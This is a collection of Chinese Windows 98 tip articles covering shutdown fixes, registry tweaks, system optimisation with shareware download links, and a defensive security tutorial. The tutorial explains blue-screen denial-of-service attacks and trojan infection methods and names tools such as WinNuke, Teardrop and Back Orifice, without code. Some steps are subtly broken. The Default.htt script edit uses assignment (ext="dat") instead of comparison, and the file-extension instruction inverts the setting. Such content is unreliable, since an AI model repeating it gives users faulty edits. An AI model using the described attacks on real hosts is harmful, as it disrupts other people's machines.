    Windows 98 SE包含最新的Advanced Configuration and Power Interface(ACPI)、OnNow and Advanced Power Management(APM)。可以检查“系统-设备管理器-系统设备”是否有这些项目，如果没有，就要刷新或重新安装。再检查“高级电源管理”的设置是否正确。

    7.注册表中定义了快速关闭系统功能。请依次选择“开始/程序/附件/系统工具/系统信息/工具/系统配置实用程序/高级”，并选中“禁用快速关机”。而Windows 98SE中解决的方法也可以运行MSCONFIG程序，在禁用快速关机前打钩。

    也可以修改注册表，只要把HKEY_LOCAL_MACHINE\system\currentControlSet\control\shutdown下面FastReboot的值由“1”改为“0”就可以了。

    8.一些现存的计算机也许需要升级BIOS才能完全支持Windows 98 SE。


Windows98安全防范基础教程

《一键清理系统垃圾》

Windows98安全防范基础教程

    本教程针对win98的个人用户，假设环境为：win98系统，个人使用，拨号上网，拥有完全权限；本教程所涉及程序并不保证任何时候，任何情况都能试验成功，由于程序更新较快，建议大家到网上寻找相应的最新程序。

    一 对win98的简单说明

    由于98对网络的支持不完善，且默认没有什么网络服务启动，也就找不到什么可利用的漏洞，因此对98的攻击并不像对2000那样‘丰富多彩’。但即使这样，98的用户仍然不能高枕无忧，看看下面的各种攻击方法，你会觉得98并不是像想象的那样安全，我们仍需要多加防备。

    二 基于win98的攻击方法

    既然要讲防守，就要知道怎样进攻，只有搞清楚了各种攻击方法，我们才能对症下药，有的放矢。

    下面总结了一下常用的攻击方法，当然有些方法对别的操作系统也是适用的。

    1 蓝屏炸弹（IGMP，ICMP）

    2 木马攻击

    3 OICQ安全

    4 恶意代码

    5 共享密码检验漏洞

    6 ARP拒绝服务攻击

    7 IPX Ping 包拒绝服务漏洞

    8 NetBIOS缓存漏洞

    9 NetBIOS 空源主机名导致系统崩溃

    10 无效驱动器类型拒绝服务漏洞

    11 NetBIOS over TCP/IP 耗尽资源漏洞

    12 concon漏洞

    三 攻击方法具体介绍及防范

    1 蓝屏炸弹

    *攻击原理：

    蓝屏攻击的对象一般是Microsoft的WINDOWS95/98操作系统，这种攻击实际上是利用WINDOWS操作系统的内核缺陷，采用大量的非法格式数据包发向被攻击的机器，使WINDOWS操作系统的网络层受到破坏，而引起蓝屏当机。

    蓝屏炸弹一般使用的是IGMP协议(Internet Group Management Protocol)，由于IGMP是一种类似ICMP(PING报文)的无连接协议,所以在向服务器连接时不需要指定连接的端口,只需要指定IP地址即可，由于WIN98不能很好的处理过大的IGMP数据包,很容易出现系统崩溃的情况,又因为WINDOWS95/98在崩溃的时候，通常是显示一个蓝色的屏幕，上面写着一些复杂的符号和数字，便形成了我们所说得蓝屏攻击。

    当然，现在的蓝屏炸弹不光只使用IGMP,还会使用ICMP进行攻击：它可向某一IP地址发送“OOB”(OUT OF BAND)数据，并攻击139端口(NETBIOS)，如果攻击者进行端口监听的话，还可攻击其它端口。当被攻击的电脑收到大量的“OOB"数据后，无法对数据进行处理，导致出现Internet连接中断或蓝屏幕死机等现象。

    *攻击工具：

    WINNUKE,SPING,TEARDROP等

    *攻击后果：

    导致Internet连接中断，windows蓝屏或死机。

    *解决办法：

    1）将NETBIOS（控制面板-网络）关闭，关闭NETBIOS还可以阻止别人访问你的共享资源；

    2）IGMP，ICMP关闭（两者可以用防火墙来屏蔽），关闭这些协议不会影响你使用INTERNET。关闭ICMP可以使陌生人对你的Ping无效（但不会影响你用ping命令去探测别人，除非对方也安装了防火墙，并且也关闭了ICMP），关闭TCP监听可以阻止木马服务端程序响应客户端软件的控制，并可防止端口扫描程序的扫描；

    3）安装防火墙，并进行配置，则基本上可以防范此类攻击；

    4) 下在相关补丁。

    2 木马攻击

    *攻击原理：

    木马，即后门程序，它包括两个部分：服务端和控制端，当目标机器运行了服务端后，黑客就可以利用控制端来控制你的机器了。

    如果你中了木马，那么它有可能对你的电脑做以下事情：创建，移动，复制，上传，删除你的文件；管理共享，格式化硬盘；记录键盘并从中提取密码；查找隐藏密码并发送到指定邮箱；控制进程，远程关机，重起，锁定鼠标和热键；操作注册表，包括浏览，增删，复制主键；向被控方法送信息等。

    *感染方式：

    1）欺骗法：利用一切欺骗行为引诱你运行服务端

    2）捆绑法：与正常程序捆绑，让你无防备的运行服务端（比如与flash捆绑）

    3）改名法：更改木马的图标并将程序改名为*.jpg.exe或*.tex.exe形式，因为windows默认不显示文件后缀，让你以为不是可执行文件，从而运行。

    4）网页法：在网页中插入恶意代码

    *常见木马：

    国产的冰河、蓝色火焰、广外女生等，国外的软件有Back Orifice、NetBus等，（树大招风这个道理大家知道吧，由于这些木马太有名了，所以各大杀毒软件都能够查杀它们，但一些不知名的小木马，或个人写的木马程序，防火墙也许就无能为力了）

    *防范办法：

    1）不执行陌生，可疑的文件，必要时用杀毒软件查杀（但不要过于相信杀毒软件）

    2）对于捆绑程序，要注意文件大小，如果你发现600k的txt文件，那你应该小心了

    3）让windows显示文件后缀：文件夹选项-查看-把‘显示已知文件的扩展名’前的勾去掉

    4）不要随便观看可疑的网页（不过，谁也说不好哪个网页可疑）

    5）定期使用查毒软件或查杀木马软件检查系统，如Iparmor

    6）安装防火墙

    如果你确定你已经中了木马，你可以在网上寻找相应的清除方法加以清除，我在此不做过多介绍了。

作者：iqst
来源：20CN网络安全小组


Windows98的小技巧

《一键清理系统垃圾》

Windows98的小技巧

         一、 Shift键（上档键） 某些应用程序安装后，要求重新启动系统后，才能正确运行。这时，我们可以选择“开始│关闭系统│重新启动计算机”后，按住Shift键，再点击“确定”，便可回避繁琐的开机过程，只是重新启动Windows，是不是要省事得多？ 此外，有些光碟在放入光驱后便会自动运行（autorun），若放入光盘时按住Shift键，便可避免这个问题。

      二、 Backspace键（退格键） 恰当使用Backspace键，会给我们的操作带来方便。在资源管理器中按Backspace键，可返回上级目录；在浏览器中按Backspace键，可返回前一个网页，给用户带来了方便。

      三、 “运行”对话框 “开始”菜单中的“运行”对话框，不仅可以运行可执行文件。我们还可以输入目录名打开一个目录（..表示Windows所在目录，.表示桌面）；可以输入URL打开网页；可以输入“\\机器名”访问计算机。相信读者已能较好的使用“运行”了。

    四、 浏览器 浏览器不但可以用来浏览网页，还可直接访问硬盘资源或网上邻居。如：可在地址栏中输入C：，即可访问C盘；输入“\\机器名”，即可访问网上邻居的计算机。

    五、 隐匿自己对文档操作的行踪 Windows的文档菜单中会对我们最近操作的文档作历史记录，我们如果将注册表HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\PoLicies\Explorer中的“NoRecentDocsHistorg”键值设为“hex：01，00，00，00”，则可禁止将最近操作过的文档放入历史记录中；如果将“ClearRecentDocsOnExit”键值设为“hex：01,00,00,00,”,则可在每次关闭系统时，自动清除文档菜单中的历史记录。

    六、 重载注册表 很多软件都要读取Windows注册表信息，但当我们手动修改注册表后往往需要重新启动，才能被应用程序使用。这时，我们可以按下Ctrl、Alt和Del三键，选择关闭程序Explorer，再在第二个对话框中选择“取消”。这时，你会发现Explorer关闭后又重载，同时也就完成了注册表的重载过程。

    七、 Dosstart.bat文件和Winstart.bat文件 Dosstart.bat文件和Winstart.bat是两个常被人遗忘的批处理文件。当计算机启动Windows时，便会自动执行Winstart.bat文件（如果存在），当机器进入纯DOS状态时，便会自动执行Dosstart.bat文件（如果存在）。读者可以根据自己的需要，充分利用这个功能。

    在Windows中有很多奇妙的用法和技巧，只要平时多留心、多尝试，一定会收到很多意想不到的收获！?


Windows98的优化

《一键清理系统垃圾》

Windows98的优化

2002-01-30· ·李建华··Yesky

1 2 3 4 5 6 7 8 9 10　下一页

    当我们打开“系统监视器”程序时，可以清楚地看到计算机的运行状态以及系统资源的利用率。这时你会发现系统资源中有相当大一部分被浪费掉了，也许你会问：“我还是刚刚打开计算机并没有做任何操作呀？”，因为对于Windows而言，系统资源（尤其是内存）永远都不会够用，因为图形化操作界面对系统资源的需求几乎是没有止境的。于是我们要做的工作当然就是如何利用这些有限的资源了，假设我们从一台刚刚组装好的计算机开始一步步地进行优化。
一、CMOS优化

    在CMOS中保存了计算机硬件的最基本配置信息，因此，CMOS的设置是否合理，将在很大程度上影响计算机的性能。为了加速计算机的启动过程，在保证计算机运行正常的情况下，可屏蔽对某些硬件的检测；为了提高运行速度，可开启各种缓存。由于CMOS设置是彻头彻尾的专业英文提示，所以对一般的朋友来说可能比较困难，下面的介绍只是就如何优化CMOS作个简单的说明，如果想对CMOS的设置多了解一些，可以查阅相关教材。

    ①关闭不用的硬件和硬件检测。
    ②直接从硬盘引导计算机，即将Boot Sequence引导顺序设置为C盘优先引导或“C only”。
    ③将“Quick Boot”设为Enable，这样可使计算机开机启动时不检测1MB以上内存，否则需要检测3次内存。
    ④不要让计算机自动检测硬盘参数，应该使用“IDE Auto Detection”检测硬盘，并将检测到的参数写入CMOS。
    ⑤“将System Boot Up Speed”设置为“High”。

    当然，CMOS的设置项还有非常多，这里不可能面面俱到。另外，不同的机器的设置也不会相同，所以这是一个渐进的过程，自己多试几次之后，就可以得到一个满意的设置。

二、安装优化

    优化过程应该从安装开始，安装前用Fdisk程序将硬盘分区为FAT32文件系统，再格式化硬盘。FAT32与FAT16相比可以加快系统启动速度，并可节省大约30％的磁盘空间，同时减少了文件分配表出错的可能性。如果安装前没有将硬盘分区为FAT32文件系统，可以在Windows里选择“程序”→“附件”→“系统工具”→“驱动器转换器（FAT32）”，启动FAT32转换器。然后在“FAT32转换器”窗口中选择欲转换为FAT32的硬盘分区（该硬盘分区不得小于512MB），并按照屏幕提示进行有关操作。

    在安装过程中应该选择“定制安装”（安装应用程序时也应如此），去掉一些不实用的组件，如“辅助选项”、“多媒体”、“录音机”等，因为我们可以找到功能更强大的工具。

Windows 98/me的优化

2002-01-30· ·李建华··Yesky

上一页　1 2 3 4 5 6 7 8 9 10　下一页

    在添加硬件时，不要安装Windows自带的驱动程序，因为硬件都自带有专门的驱动程序，与Windows自带的驱动程序相比，专门的驱动程序更具有针对性，更能发挥硬件的性能。
三、CPU和显卡的优化

    CPU的优化可不是CPU的超频，因为大幅度的超频虽然可以改善系统性能，但却会使系统变得不稳定，严重时甚至损坏CPU。小幅度的超频虽然可以避免上述弊端，但性能的提升并不明显。因此，超频是一种不足取的行为（至少对我们普通用户如此）。

    CPU是否充分发挥其潜力所在，与主板的芯片和内存的容量及速度都有很大的关系。当我们已经买这一切之后，如何实现对CPU的优化呢？CPU的优化需要借助专门的工具来完成——通过减少一些不必要的进程，使CPU有更多的时间处理当前任务。

    PC Accelerator是一个用于Win 9x/me/NT/2000/xp的优化软件，目前最新版本为6000 v5.3 SE，该软件提供的优化功能非常实用，它的主要功能包括：优化系统Internet连接的“TCP/IP”、优化显示卡、系统安全设置和优化CPU及Windows的隐含设置。不过，由于该软件属于共享软件，未注册版本有部分功能的限制，因此这里我们只讨论如何利用PC Accelerator优化显卡和CPU。

    1.显卡优化

    单击“graphics”标签项，该对话框中提供了针对3D加速卡的优化设置（如图1），程序提供目前市面上几乎所有的主流3D显卡。设置方法非常简单，首先在“3D graphics Card”选区中选择自己的显卡类型，然后在“3D Graphics General Options”选区中对显卡的参数进行详细的设置，如果你对显卡的设置不是很清楚，可以选择“Optimal”单选按钮，并选中相应项目的复选框（建议全部选中），否则可以选择“Custom”单选按钮自定义显卡各项参数，最后在“Advanced Options”选区中选中“Enable all performance increasing features built into ……”复选框即可。

图1

    2.CPU优化
    单击“System”标签项，在该对话框中提供了针对CPU及系统总线的所有参数（如图2）。另外，该对话框中还提供了优化系统文件存取、CD-ROM加速、系统菜单显示速度、窗口动画和平滑滚动、系统启动时压缩注册表、键盘缓冲、鼠标比率等诸多选项，建议全部选中，以获得系统最优化，然后在“Processor Type”下拉列表中选择CPU类型，并在“Current Memory Configuration”下拉列表中选择当前内存容量。

图2

    所有的设置完成后，单击“Apply Settings”菜单项确定设置，程序提示只有系统重新启动以上设置才能生效。另外，可以将当前设置保存为一个文件，以便下次重新安装操作系统后直接调用。
    软件类型：共享
    文件尺寸：3.31MB
    下载地址：http://file2.mydrivers.com/tools/others/pcxl53.exe

Windows 98/me的优化

2002-01-30· ·李建华··Yesky

上一页　1 2 3 4 5 6 7 8 9 10　下一页

四、内存优化
    在Windows中，用户只能对虚拟内存进行管理，而不能对物理内存进行配置，但一些软件关闭后并不释放所占用的内存空间，白白浪费有限的内存资源，因此，对内存的优化主要是通过第三方软件来实现，这里以MemTurbo为例对内存进行优化。

    MemTurbo安装成功后将随系统启动并在系统托盘上出现一个绿色的图标，此图标下有一数值，表示当前剩余的物理内存容量。程序的主界面如图3所示，上半部分显示CPU的使用情况，下半部分则显示了内存使用的详细资料，这一点与Win 2000的“任务管理器”相似。

图3

    1.整理内存
    Win 9x为每一个进程自动分配一块固定的内存空间，但Win 9x系统在内存的管理上并不稳定，当启动的程序过多时很容易出现内存不足而一般性错误。执行MemTurbo主界面上的“文件”→“整理碎片并恢复”菜单项，软件会自动对物理内存进行整理，改善内存中当前运行各个进程所涉及的数据位置，将数据排列整齐，最终达到快速流畅的运行。

    2.内存净化

    大家都知道，计算机在运行在型程序（如PhotoShop）时，会在内存中放置大量的交换文件，当我们不想关闭当前程序将其切换到后台（最小化）而运行其它程序时，可用的内存数量明显减少，这时我们就可以利用MemTurbo的“净化RAM”功能清除交换文件，从而保证系统前台运行的程序能够顺利启动，图4为MemTurbo进行内存净化进的进度指示界面。

Windows 98/me的优化

2002-01-30· ·李建华··Yesky

上一页　1 2 3 4 5 6 7 8 9 10　下一页

    3.优化高速缓存
    由于CPU工作的速度比内存读写速度快，CPU从内存读取数据时需要花费时间等待内存进行读写，严重地降低了系统的效率。人们为了提高CPU读写程序和数据的速度，在内存和CPU之间增加了高速缓存（Cache）。在Cache中保存着内存常用内容的部分副本，CPU在读写数据时，首先访问Cache，如果Cache中有欲读取的数据，就从Cache中读取数据。只有当Cache中没有所需数据时，CPU才去访问内存。由于Cache的读写速度更快，因此CPU能迅速地完成数据的读写，进而提高计算机整体的工作速度。计算机中默认的Cache都是针对普通用户进行设置的，但对于一些特殊用户，如3D动画设计者，当进行3D动画处理时要想使画面更为流畅，默认的Cache显然是不够用的，而在MemTurbo中用户可以根据自己的需要自行调节。点击程序主界面中的“Cache调整”标签项出现如图5所示画面，在这里我们可以自行调节。

图5

    MemTurbo的设置也非常简单，点击程序主界面中的“选项”标签项，按图6所示画面进行设置就可使MemTurbo最大限度地发挥其功能。

图6

    通过设置可以让Memturbo自动完成多数内存管理，所以使用起来相当方便，它就像一个忠实的卫士时刻注视着内存的使用使用情况，每当内存的占用率达到它的临界设置点时就会自动整理内存，以保证内存中的数据排列整齐，使内存发挥出最大效率。该软件对于那些配置较低的计算机，特别是内存比较小的用户非常有益。
    软件类型：共享
    文件尺寸：795KB（汉化文件：581KB）
    下载地址：http://file2.mydrivers.com/tools/others/pcxl53.exe（汉化文件：http://sq.onlinedown.net/down/HA-MemTurbo21-LDR.zip）

五、硬盘优化

    硬盘的性能主要体现在硬盘容量、转速、缓存、接口类型等方面，但如何对现有的硬盘进行优化呢？主要从以下三个方面着手：1.调节磁盘缓存；2.清除无用的垃圾文件；3.整理磁盘碎片。

上一页　1 2 3 4 5 6 7 8 9 10　下一页

【责任编辑：】
【发表评论】【关闭窗口】

■ 相关内容

  Windows 2000的优化
  系统优化全集
  对“缓存”的全面理解和优化
  优化WINDOWS下运行MS—DOS程序窗口
  Win2000虚拟化设置谈内存优化
  Windows XP的硬盘空间优化

感谢访问天极网，如果您觉得该文章涉及版权问题，请看这里！

1.调节磁盘缓存
    通常，Windows系统会自动根据系统内存大小设置预读缓冲区的大小。它们对台式机、笔记本电脑和网络服务器都很重要。因为台式电脑内存价格比较低廉，可以使用更多的内存作为缓存；笔记本电脑的内存虽然比较昂贵，但设置比较多的缓存可以减少对硬盘的读写操作，从而达到省电的作用；网络服务器的效率与硬盘的存取效率更加密切，配置较多的缓存可以从根本上提高效率。上述这些缓存空间的大小都可以通过Windows直接调节，具体操作如下：

    打开“控制面板”→“系统”→“性能”→“文件系统”，选择“硬盘”标签项，在“此计算机的主要用途”下拉列表中选择“网络服务器”（如图7）。如果你不是经常使用CD-ROM，可以在“CD-ROM”标签项中将Cache容量设为最小，以减少内存开销。单击“软盘”标签项，去掉“每次启动计算机时都搜索新的软盘驱动器”前面的“√”，以缩短开机时间。至于虚拟内存则可以根据你平时运行的程序所占用的内存大小进行设置，最好将“最大值”与“最小值”设置为相同的数值，防止Windows频繁地改变页面文件的大小。

图7

    除此之外，还可以通过修改System.ini文件来精确调节磁盘缓存大小，不过操作过程比较繁琐，不推荐初级用户使用。
    Win 9x启动时，要从硬盘读入大量的数据至内存，提高硬盘的读取速度也是相当重要的，所以应打开硬盘的DMA功能。操作如下：左击“我的电脑”，从弹出的菜单中选择“属性”，在设备管理器中又击当前计算机的硬盘打开硬盘属性对话框，将DMA选中（硬盘必须支持DMA模式）。同样，打开CD-ROM的DMA。

    2.清除无用的垃圾文件

    Windows及其平台下的应用程序在安装和运行的过程中会产生大量的临时文件和备份文件，如果非正常关机则更是如此。时间一长就会导致大量的垃圾文件充斥于硬盘之中，不仅浪费了宝贵的硬盘空间，而且还会严重影响系统的运行速度，严重的甚至会导致系统崩溃，因此垃圾文件的清理工作就显得异常重要了。微软好像也意识到了垃圾文件的危害性，给Windows系统都附带了“磁盘清理”程序，但其功能太单一，远远不能满足我们的需求，因此我们不得不借助于第三方软件。下面将向大家介绍的System Cleaner 2001是由InforTech公司推出的一款系统优化类共享软件，它能支持Windows 9x和Windows NT/2000操作系统，通过扫描清除垃圾文件，以保持系统的清洁，该软件的下载链接是http://gwbn.onlinedown.net/down/systemcleaner_setup.exe。

Windows 98/me的优化

2002-01-30· ·李建华··Yesky

上一页　1 2 3 4 5 6 7 8 9 10　下一页

    ①System Cleaner的设置
    打开System Cleaner，在清理垃圾文件之前我们需要对它进行必要的设置，主要的设置如下：

    ●设置对垃圾文件的处理动作
    单击窗口左侧的“Options”命令，然后选择“Options”标签卡中的“General Options”按钮，出现如图1所示窗口，可根据需要将垃圾文件移至回收站或永久删除或移到其它文件夹或压缩并保存。如果选中“Confirm Delete”复选框，那么在每次删除文件时都会弹出一个确认框要求确认是否删除，否则删除文件时系统不给任何提示。

Windows 98/me的优化

2002-01-30· ·李建华··Yesky

上一页　1 2 3 4 5 6 7 8 9 10　下一页

    ●高级设置
    在单击“Advanced”按钮后出现的窗口里我们可以设置找到垃圾文件时系统发出声音、System Cleaner的模式：基本系统清理或者完全清理，系统缺省值为基本系统清理。
    如果你想每次启动Windows时都自动加载运行System Cleaner，并按照任务列表在设定的时间内在后台执行扫描工作，只需要点击“Automation”按钮，出现如图2所示窗口，选择“Automatically run System Cleaner Scheduler on windows startup”和“Automatically Load Scheduler when System Cleaner closes”这两个复选框，然后单击“Schedule Options”按钮对预定的扫描时间进行设置。

图9

    ●设置扫描的驱动器
    单击窗口左侧的“Options”命令，然后选择“Temporary Files”标签卡中的“Options”按钮，出现如图3所示窗口，然后在“Select drives to Scan”列表中，一一选中欲进行垃圾文件扫描的驱动器。若要在扫描完成时自动清除垃圾文件，可以选中“Automatically clean files when scan is completed”复选框，如果想在系统扫描完成后发出声音提醒你，可选中“Play sound after finished scanning”复选框。

图10

    ●设置垃圾文件类型

    单击“Type of Files”按钮，在“Files to Scan”列表中，列出了System Cleaner默认的垃圾文件类型，包括临时文件（Temporary Files）、备份文件（Backup Files）、丢失簇文件（Lost Cluster Files）、帮助临时文件（Help Temporary Files）、安装临时文件（Setup temporary Files）和系统日志文件（System Log Files）（如图4）。

Windows 98/me的优化

2002-01-30· ·李建华··Yesky

上一页　1 2 3 4 5 6 7 8 9 10　下一页

    若欲添加新的垃圾文件类型，可先在列表下方的文本框中键入文件类型，然后单击“Add”按钮，即可将该类型的文件添加到扫描列表中，System Cleaner会将该文件类型视为垃圾文件而一同扫描出来。
    ●设置扫描范围
    有时为了安全起见或者缩短扫描时间，希望跳过某个文件夹，这时我们可以单击窗口左侧的“Options”命令，然后选择“Temporary Files”标签卡中的“Folders”按钮，勾选该文件夹即可。如果该文件夹不在列表中，可以点击“Add”按钮然后添加文件夹至列表中（如图5）。

图12

    单击“Broken Shortcuts”标签卡，在这里我们主要是对无效的快捷方式进行设置（如图6）。包括无效的桌面快捷方式、开始菜单里的快捷方式、最近没有用过的指向文件的快捷方式，无效的指向软驱的快捷方式、指向光驱的快捷方式、指向网络驱动器的快捷方式，建议全部选中。

图13

    单击“Directories”标签卡，这里主要对存放临时文件的文件夹进行设置，一般情况下系统会自动设定，当选中“Automatically Clean files when scanning is completed”复选框时，删除文件时系统将不会给任何提示（如图7）。若要添加自定义临时文件夹，请单击“More”按钮，然后点击“Add”按钮进行添加。

图14

    ②清除垃圾文件

    单击窗口左侧的“Clean My Computer”命令，在“What do you want to scan?”区中有三个单选项（如图8），分别为“查找并删除垃圾文件”、“查找并删除无效的快捷方式”和“清理临时文件和Cache文件”，选择好清除动作后，单击“Run Scan Now”按钮可立即按照先前的设置开始扫描，若欲中途停止扫描，只需单击“Stop”按钮即可。

图15

    扫描完毕，垃圾文件显示在主窗口下方的文件列表框中，若欲删除列表中所有的文件，只需单击“Clean All”即可，若只删除部份文件，则将欲删除的文件前面打上“√”，然后单击“Clean Selected”按钮即可（如图9）。

图16

    ③恢复被删除的文件

    有时我们会在删除垃圾文件的同时将一些有用的文件也一起删除掉，导致系统不能正常工作，其实后悔药还是有卖的，不过首先要保证在删除垃圾文件时没有采取将其永久删除的动作，单击窗口左侧的“Restore Wizard”命令启动恢复向导（如图10），在列表框中系统已经按时间日期和文件大小将被删除的文件打包分类，选择欲恢复的文件包（当然也连同垃圾文件一起恢复过来了），然后按照向导的提示一步步的操作即可完成文件的恢复。

Windows 98/me的优化

2002-01-30· ·李建华··Yesky

上一页　1 2 3 4 5 6 7 8 9 10　下一页

    3.利用Norton Speed Disk全面优化磁盘
    Norton Speed Disk是Norton 2001中的一个磁盘优化组件，利用它可以实现Win 9x/me/NT/2000下的注册表和交换文件的优化，使得应用程序的启动速度最快可以提高50％。通过磁盘加速这条最快的、最有效效的优化途径，可以实现更快的访问速度。

    ●碎片文件的优化
    Speed Disk启动时会首先检查硬盘主分区，然后列出一个优化方案。该方案将详细报告磁盘中现有多少碎片文件待优化，并给出三种优化建议（如图18）。建议选择默认的“完全优化”，另外，在对话框的最下端还有一个“优化交换文件”的复选框，也一并选中吧！

图18

    单击“开始”按钮，即可运行Speed Disk进行磁盘加速整理，其整理文件的速度比起Windows自带的“磁盘碎片整理程序”要快得多。另外，Speed Disk还能根据文件的访问频率智能地对文件进行优化。　　●软件的设置
    在程序主界面中单击“属性”按钮，从弹出的下拉菜单中选择“选项”，出现“磁盘加速选项”对话框（如图19），在这里我们可以对Speed Disk进行详细的设置。

图19

    在“优化”标签项的下拉列表中选择欲进行优化的磁盘分区，单击“保存”按钮。在“优化方式”区中选择磁盘的优化方案，并在选中“完全优化”单选项后，单击“定制”按钮来根据自己的需要定制优化方案。“安全选项”区中的“写入校验”和“清除剩余空间”两项也可以复选，虽然在很大程度上提高了数据的安全性，但会影响Speed Disk的运行速度。

六、注册表优化

    目前注册表优化软件非常多，如超级兔子、Windows优化大师、WinBoost、RegCleaner等，这些软件不仅使用简单，而且功能强大，这里仅介绍利用RegCleaner优化注册表。

    RegCleaner是一款非常优秀并且体积小巧的注册表修改／优化软件，目前最新版本为4.3，适用于Windows全系列平台，可从http://download.sina.com.cn/scgi/click.pl?s_id=4192&href=0&ants=/RegCleaner.exe下载得到。

    1.清理注册表

    打开“Tools”菜单中的“Registry Cleanup”子菜单，选择“OLE Cleaner”将清除所有不再使用的动态链接库；选择“Orphan file reference finder”将只清除无连接的孤立文件；选择“Automatic Registry cleaner”则自动清洁注册表；选择“Do them all”则将完成以上所有操作（如图20）。

图20

    执行以上操作后，程序将自动扫描注册表，片刻后将显示一个详细的垃圾信息列表，选中需要删除的注册表项（按“Ctrl+A”选中所有），然后单击“Remove Selected”按钮，删除所有的注册表垃圾信息。

    2.彻底删除已被卸载的软件

    在Windows系统中，经常会出现这种情况，明明已经将软件卸载，但在“控制面板”中的“添加/删除程序”中还可以看到该软件的名称，无论如何也不能将它们删除——被Windows告知该程序已被卸载，其实这就是所谓的注册表“僵尸”，解决的办法很简单。在RegCleaner主界面窗口中选择“Software”标签项，列表中将显示所有已经安装的应用程序。若要从注册表中删除某个或多个软件的键值，只需简单地一一选中，然后再单击“Remove Selected”按钮即可。

Windows 98/me的优化

2002-01-30· ·李建华··Yesky

上一页　1 2 3 4 5 6 7 8 9 10

    3.关闭启动时不必要的程序
    操作系统保持高速运行的秘诀在于尽量减少在同一时间运行过多的程序，而一些软件在安装的过程中会自作主张地将自己添加到启动菜单中，为了避免它们随系统启动就需要对注册表进行修改。

    在“RegCleaner主界面窗口中选择“StartUP list”标签项，那些随系统启动的软件都列在这里，选中欲关闭的启动程序然后点击“Remove Selected”按钮。利用该功能还可以发现和删除系统中的木马程序。

    4.删除文件类型

    在RegCleaner主界面窗口中选择“File Types”标签项，列表中列出了计算机中所有文件扩展名和文件类型，如果发现有些与文件类型相关联的应用程序已被删除，或这类文件已经没有用处，可以一一选中并用“Remove Selected”删除掉（如图21）。

图21

    5.撤销对注册表的修改

    有时因误删除了某个注册表键值而导致系统工作不正常，可以选择“Backups”标签项，所有已作修改的键值都保存在这里，并且还列出了被删除键值的时间和日期，只要选中欲恢复的键值，然后点击“Restore selected”就可以了。注意：这里千万不能搞错，否则可能会导致不可预知的错误。

七、有关系统优化的其它方法

    1.减少字体数量。
    2.在满足需要的前提下尽量降低显示颜色值。
    3.关闭Windows的动画。
    4.关闭ActiveDesktop。
    5.删除多余的系统图标及DLL文件。
    6.减少驱动程序的装载。
    7.用“快猫加鞭”等工具软件优化MODEM的传输速度。
    8.对于Win me用户请禁用“系统还原”。
    9.定期删除IE的脱机文件或将存放脱机文件的文件夹更改到非系统分区中。
    10.取消鼠标指针的阴影。
    11.经常整理硬盘碎片。


WINDOWS 98 奇 招 酷 集！！

《一键清理系统垃圾》

WINDOWS 98 奇 招 酷 集！！

1.Windows 98也能预览影音文件

众所周知，在Windows 2000/XP中，系统可以对各种影音文件进行实时预览，那么，在Windows98中能不能实现呢？当然也可以，方法如下：

    用记事本打开C:\Windows\web\目录下的Default.htt文件，进行如下编辑。

    1. 找到“var wantMedia= false; // cool, but may hinder media file manipulation”，将“false”改为“true”；

    2. 找到“if (ext == ''avi'' || ext == ''mov'' || ext == ''qt'' || ext == ''mpe'' || ext == ''mpeg'' || ext == ''mpg'')”，此语句表示可以预览的影视文件类型。将你所知道的媒体格式如DAT 、RM、WMV以相同的语法添加到此语句的后边。改写成“if (ext == ''avi'' || ext == ''mov'' || ext == ''qt'' || ext == ''mpe'' || ext == ''mpeg'' || ext == ''mpg''||ext="dat"||ext="rm"

    ||ext="wmv")；

    3. 找到“else if (ext == ''aif'' || ext == ''aifc'' || ext == ''aiff'' || ext == ''au'' || ext == ''mid'' || ext == ''rmi'' || ext == ''snd'' || ext == ''wav'')”，此语句表示可以预览的声音文件类型。将你所知道的媒体格式如MP3等以相同的的书写语法添加到此语句的后边。改写成“else if (ext == ''aif'' || ext == ''aifc'' || ext == ''aiff'' || ext == ''au'' || ext == ''mid'' || ext == ''rmi'' || ext == ''snd'' || ext == ''wav''||ext == ''mp3'')”，修改完毕后保存文件。

    再用记事本打开C:\Windows\web\目录下的folder.htt文件，重复上面的修改工作，修改完毕后保存即可。

    现在找一个影音文件预览一下试试，是不是不用打开相应的媒体播放软件，Windows 98就可以即点即现，实时进行播放预览了？

2.为Win98巧配SCSI驱动
单位买了一台曙光1220电脑用来存储重要的数据。刚买来时，根据我们的要求安装了Win98和Win2000的双操作系统，使用了半年之后，由于软件的原因不得不重新安装系统。当然首先是安装Win98，但是每当安装程序使用Scandisk命令扫描硬盘时都会出现“非法媒体错误”的提示，我打电话给曙光服务器服务中心，把我所遇到的情况说明后，他们回答说是服务器以前从来没有装过Win98，可能对Win98支持得不好或者硬盘损坏了，具体情况请本地的代理商进行解决。我觉得有一点可以肯定，机器肯定可以安装Win98，我还使用了一段时间没出现任何问题，但系统不是我自己装的，不知是如何安装上的，还是自己先想想办法。

    是不是原先的操作系统有问题呢?于是在Win98启动盘的引导下进入DOS，使用Fdisk把硬盘重新分区，当分到最后一个分区后，对硬盘的校验怎么都通不过，最后死机。使用分区魔术师也不行。是不是因为硬盘损坏了呢?由于硬盘是使用的SCSI接口，服务器系统本身带有低级格式化程序，于是对硬盘进行低格，低格通过，并没有坏道显示，证明硬盘没有问题。于是又分区、格式化，但问题依然。难道是Win98的启动盘启动系统不支持SCSI硬盘?于是我使用Win2000的安装盘启动系统，进行分区、格式化、安装Win2000都顺利通过，原来真是这样！我把服务器所带的驱动盘都找了出来，其中有一张“Ultra160 Family Mannager Set Versionl.10”，里面好像有For Win95/98/NT4.0/DOS的驱动程序，于是赶紧打开里面的说明文件，上面全是英文，只好硬着头皮看了。果然如此，使用DOS启动不能加载SCSI的驱动程序，因此也就不能正确识别SCSI硬盘。可不可以直接使用服务器附带的驱动？试了一下果然奏效。具体解决办法如下：

    1.准备一张Win98的启动盘，如果你需要使用CDROM安装软件，就必需带有光驱的驱动程序。

    2.拷贝服务器驱动软盘上DOS目录下的ASPI8U2.SYS和ASPICD.SYS到Win98的启动盘(此步最关键)。

    3.重新启动系统并使用第2步制作的启动盘引导，然后在进行分区、格式化后需要再次启动系统。一切OK。

    4.当出现启动菜单时，选择从光盘安装Win98。

    5.当看到“增加新硬件向导”和“PCI SCSI Bus Controller”时，单击“下一步”。

    6.选择“搜索最好的驱动程序”，单击“下一步”，选择从软盘安装，在软盘里插入SCSI的驱动软盘，根据提示安装完毕。

3.更改常用路径，减少系统盘负担

